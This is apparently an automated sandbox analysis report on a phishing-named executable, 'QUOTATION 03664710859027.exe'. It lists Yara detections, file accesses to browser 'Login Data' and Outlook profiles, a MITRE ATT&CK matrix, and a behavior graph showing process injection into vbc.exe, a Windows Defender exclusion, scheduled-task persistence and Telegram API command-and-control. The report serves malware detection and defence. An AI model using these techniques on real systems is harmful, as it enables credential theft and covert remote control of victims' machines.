                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeQueries volume information: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3545341483.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3549205458.0000000006CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3549205458.0000000006C62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3549250427.0000000007374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3549250427.000000000740A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3549205458.0000000006D68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3549250427.0000000007478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1116689822.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3549250427.00000000071A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3549205458.0000000006A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: QUOTATION 03664710859027.exe PID: 7584, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7980, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7380, type: MEMORYSTR
                Source: Yara matchFile source: 0000000D.00000002.3549205458.0000000006D68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3549250427.0000000007478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7980, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7380, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1116689822.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: QUOTATION 03664710859027.exe PID: 7584, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7980, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7380, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3545341483.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3549205458.0000000006CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3549205458.0000000006C62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3549250427.0000000007374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3549250427.000000000740A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3549205458.0000000006D68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3549250427.0000000007478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1116689822.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3549250427.00000000071A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3549205458.0000000006A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: QUOTATION 03664710859027.exe PID: 7584, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7980, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7380, type: MEMORYSTR
                Source: Yara matchFile source: 0000000D.00000002.3549205458.0000000006D68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3549250427.0000000007478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7980, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7380, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scheduled Task/Job
                311
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory23
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job
                31
                Obfuscated Files or Information
                Security Account Manager111
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp
                LSA Secrets41
                Virtualization/Sandbox Evasion
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Masquerading
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640567 Sample: QUOTATION 03664710859027.exe Startdate: 17/03/2025 Architecture: WINDOWS Score: 100 49 reallyfreegeoip.org 2->49 51 api.telegram.org 2->51 53 2 other IPs or domains 2->53 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 79 12 other signatures 2->79 8 QUOTATION 03664710859027.exe 7 2->8         started        12 IEGkgGtnYpDN.exe 5 2->12         started        14 svchost.exe 2->14         started        signatures3 75 Tries to detect the country of the analysis system (by using the IP) 49->75 77 Uses the Telegram API (likely for C&C communication) 51->77 process4 dnsIp5 41 C:\Users\user\AppData\...\IEGkgGtnYpDN.exe, PE32 8->41 dropped 43 C:\Users\...\IEGkgGtnYpDN.exe:Zone.Identifier, ASCII 8->43 dropped 45 C:\Users\user\AppData\Local\...\tmpE82C.tmp, XML 8->45 dropped 47 C:\Users\...\QUOTATION 03664710859027.exe.log, ASCII 8->47 dropped 81 Writes to foreign memory regions 8->81 83 Allocates memory in foreign processes 8->83 85 Adds a directory exclusion to Windows Defender 8->85 17 powershell.exe 23 8->17         started        20 vbc.exe 15 2 8->20         started        23 powershell.exe 22 8->23         started        25 schtasks.exe 1 8->25         started        87 Multi AV Scanner detection for dropped file 12->87 89 Injects a PE file into a foreign processes 12->89 27 vbc.exe 12->27         started        29 schtasks.exe 12->29         started        61 127.0.0.1 unknown unknown 14->61 file6 signatures7 process8 dnsIp9 63 Loading BitLocker PowerShell Module 17->63 31 conhost.exe 17->31         started        33 WmiPrvSE.exe 17->33         started        55 api.telegram.org 149.154.167.220, 443, 54598, 61943 TELEGRAMRU United Kingdom 20->55 57 checkip.dyndns.com 193.122.6.168, 49706, 49709, 49711 ORACLE-BMC-31898US United States 20->57 59 reallyfreegeoip.org 104.21.80.1, 443, 49707, 49708 CLOUDFLARENETUS United States 20->59 35 conhost.exe 23->35         started        37 conhost.exe 25->37         started        65 Tries to steal Mail credentials (via file / registry access) 27->65 67 Tries to harvest and steal browser information (history, passwords, etc) 27->67 39 conhost.exe 29->39         started        signatures10 process11

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.